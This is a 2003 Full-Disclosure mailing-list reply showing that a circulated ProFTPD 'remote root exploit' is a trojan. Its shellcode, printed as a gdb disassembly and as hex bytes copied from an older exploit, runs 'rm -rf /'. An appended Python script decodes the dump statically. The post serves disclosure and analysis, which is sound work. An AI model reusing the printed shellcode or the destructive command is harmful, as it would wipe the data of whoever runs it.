Re: [Full-Disclosure] ProFTPD-1.2.9rc2 remote root exploit

From: zero (zeroboy_at_arrakis.es)
Date: 10/24/03

    To: full-disclosure@lists.netsys.com
    Date: Fri, 24 Oct 2003 21:39:56 +0200


    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    Hmmm, let's see:

    Dump of assembler code for function shellcode:
    0x08049480 <shellcode+0>: xor %eax,%eax
    0x08049482 <shellcode+2>: push %eax
    0x08049483 <shellcode+3>: push $0x582f2066
    0x08049488 <shellcode+8>: push $0x722d206d
    0x0804948d <shellcode+13>: push $0x7258632d
    0x08049492 <shellcode+18>: push $0x41414141
    0x08049497 <shellcode+23>: push $0x41414141
    0x0804949c <shellcode+28>: push $0x41414141
    0x080494a1 <shellcode+33>: push $0x41414141
    0x080494a6 <shellcode+38>: push $0x4368732f
    0x080494ab <shellcode+43>: push $0x6e69622f //
    /bin/shCAAAAAAAAAAAAAAAA/cXrm -rf /X
    0x080494b0 <shellcode+48>: xor %eax,%eax
    0x080494b2 <shellcode+50>: mov %al,0x7(%esp,1)
    0x080494b6 <shellcode+54>: mov %al,0x1a(%esp,1)
    0x080494ba <shellcode+58>: mov %al,0x23(%esp,1)
    0x080494be <shellcode+62>: mov %esp,0x8(%esp,1)
    0x080494c2 <shellcode+66>: xor %ebx,%ebx
    0x080494c4 <shellcode+68>: lea 0x18(%esp,1),%ebx
    0x080494c8 <shellcode+72>: mov %ebx,0xc(%esp,1)
    0x080494cc <shellcode+76>: xor %ebx,%ebx
    0x080494ce <shellcode+78>: lea 0x1b(%esp,1),%ebx
    0x080494d2 <shellcode+82>: mov %ebx,0x10(%esp,1)
    0x080494d6 <shellcode+86>: mov %eax,0x14(%esp,1)
    0x080494da <shellcode+90>: xor %ebx,%ebx
    0x080494dc <shellcode+92>: mov %esp,%ebx
    0x080494de <shellcode+94>: lea 0x8(%esp,1),%ecx
    0x080494e2 <shellcode+98>: xor %edx,%edx
    0x080494e4 <shellcode+100>: lea 0x14(%esp,1),%edx
    0x080494e8 <shellcode+104>: mov $0xb,%al
    0x080494ea <shellcode+106>: int $0x80
    0x080494ec <shellcode+108>: xor %ebx,%ebx
    0x080494ee <shellcode+110>: xor %eax,%eax
    0x080494f0 <shellcode+112>: inc %eax
    0x080494f1 <shellcode+113>: int $0x80
    0x080494f3 <shellcode+115>: add %al,(%eax)
    End of assembler dump.

    Let's give credits to the original c0d3rs of this shellcode. Nobody
    remembers jinglebellz.c?

    <snip>
    /*
                jinglebellz.c - local/remote exploit for mpg123
                (c) 2003 GOBBLES Security seXForces

    [...]

    unsigned char linux_shellcode[] = /* contributed by antiNSA */
             "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x3b\x50\x31\xc0\x68\x6f"
             "\x72\x74\x0a\x68\x6f\x20\x61\x62\x68\x2d\x63\x20\x74\x68\x43"
             "\x54\x52\x4c\x68\x73\x2e\x2e\x20\x68\x63\x6f\x6e\x64\x68\x35"
             "\x20\x73\x65\x68\x20\x69\x6e\x20\x68\x72\x66\x20\x7e\x68\x72"
             "\x6d\x20\x2d\xb3\x02\x89\xe1\xb2\x29\xb0\x04\xcd\x80\x31\xc0"
             "\x31\xff\xb0\x05\x89\xc7\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66"
             "\xba\x70\x50\x52\xb3\x02\x89\xe1\x31\xd2\xb2\x02\xb0\x04\xcd"
             "\x80\x31\xc0\x31\xdb\x31\xc9\x50\x40\x50\x89\xe3\xb0\xa2\xcd"
             "\x80\x4f\x31\xc0\x39\xc7\x75\xd1\x31\xc0\x31\xdb\x31\xc9\x31"
             "\xd2\x68\x66\x20\x7e\x58\x68\x6d\x20\x2d\x72\x68\x2d\x63\x58"
             "\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41\x41\x41"
             "\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f\x62\x69"
             "\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44\x24\x23"
             "\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24\x0c\x31"
             "\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14\x31\xdb"
             "\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0\x0b\xcd"
             "\x80\x31\xdb\x31\xc0\x40\xcd\x80";

    </snip>

    Well well, just a nice copy paste of some of it? :pPpPpPppP

    And the exact cmd is:
    execve("/bin/sh", {"/bin/sh", "-c", "rm -rf /", NULL}, {"rm -rf /", NULL})

    NOTE: In this one ~ is changed for a nicer one: /

    Have a nice turkey.

    Cheerz

    www.citfi.org
    www.podergeek.com
    **********************************
    "The further backward you look, the further forward you can see" Winston
    Churchill
    "Access is GOD..."

    -----BEGIN PGP SIGNATURE-----
    Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>

    iQA/AwUBP5lx/Q0R8jZM93x8EQJCdwCg9HfcZVDSO8/JCA17lHdkkKT7nKEAn0C6
    l9RpeQ2ZrufRkkV3dflO1dTB
    =kkQd
    -----END PGP SIGNATURE-----

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
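The kind of static check the post above does by hand, written out as an added example (not code from the original post or from the exploit's author): it replays the pushes and the NUL stores from the gdb dump to recover the execve argv and lists the syscall numbers reached, so a "proof of concept" that actually runs rm -rf / is caught by reading it rather than by running it. The DUMP string is a subset of the page's disassembly with addresses dropped; no other inputs are assumed.

```python
import re

# Instructions from the post's gdb dump (addresses dropped; the argv pointer
# stores, which do not change the string bytes, are omitted for brevity).
DUMP = """
xor %eax,%eax ; push %eax
push $0x582f2066 ; push $0x722d206d ; push $0x7258632d
push $0x41414141 ; push $0x41414141 ; push $0x41414141 ; push $0x41414141
push $0x4368732f ; push $0x6e69622f
xor %eax,%eax ; mov %al,0x7(%esp,1) ; mov %al,0x1a(%esp,1) ; mov %al,0x23(%esp,1)
lea 0x18(%esp,1),%ebx ; lea 0x1b(%esp,1),%ebx
mov $0xb,%al ; int $0x80
xor %eax,%eax ; inc %eax ; int $0x80
"""

PUSH = re.compile(r"push\s+(%eax|\$0x[0-9a-f]+)")
NUL_STORE = re.compile(r"mov\s+%al,0x([0-9a-f]+)\(%esp,1\)")
ARGV_LEA = re.compile(r"lea\s+0x([0-9a-f]+)\(%esp,1\),%ebx")
EAX_OP = re.compile(r"xor %eax,%eax|inc %eax|mov \$0x([0-9a-f]+),%al|int \$0x80")

def stack_image(dump):
    """Replay the pushes (the last push lands at %esp), then apply the NUL stores."""
    words = [b"\0" * 4 if m.group(1) == "%eax" else int(m.group(1)[1:], 16).to_bytes(4, "little")
             for m in PUSH.finditer(dump)]   # %eax is zero at its push (xor %eax,%eax)
    img = bytearray(b"".join(reversed(words)))
    for m in NUL_STORE.finditer(dump):        # %al is zero: each store terminates a string
        img[int(m.group(1), 16)] = 0
    return bytes(img)

def cstr(img, off):
    return img[off:img.index(b"\0", off)].decode("ascii")

def recover_argv(dump):
    """argv[0] is %esp itself; the lea ...,%ebx offsets give the remaining argv entries."""
    img = stack_image(dump)
    return [cstr(img, o) for o in [0] + [int(m.group(1), 16) for m in ARGV_LEA.finditer(dump)]]

def syscalls(dump):
    """Track %eax through the idioms used here and record the number at each int $0x80."""
    eax, nums = 0, []
    for m in EAX_OP.finditer(dump):
        op = m.group(0)
        if op.startswith("xor"): eax = 0
        elif op.startswith("inc"): eax += 1
        elif op.startswith("mov"): eax = (eax & ~0xFF) | int(m.group(1), 16)
        else: nums.append(eax)
    return nums  # on 32-bit Linux, 11 is execve and 1 is exit
```

recover_argv(DUMP) yields ['/bin/sh', '-c', 'rm -rf /'] and syscalls(DUMP) yields [11, 1], matching the execve line the post gives.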

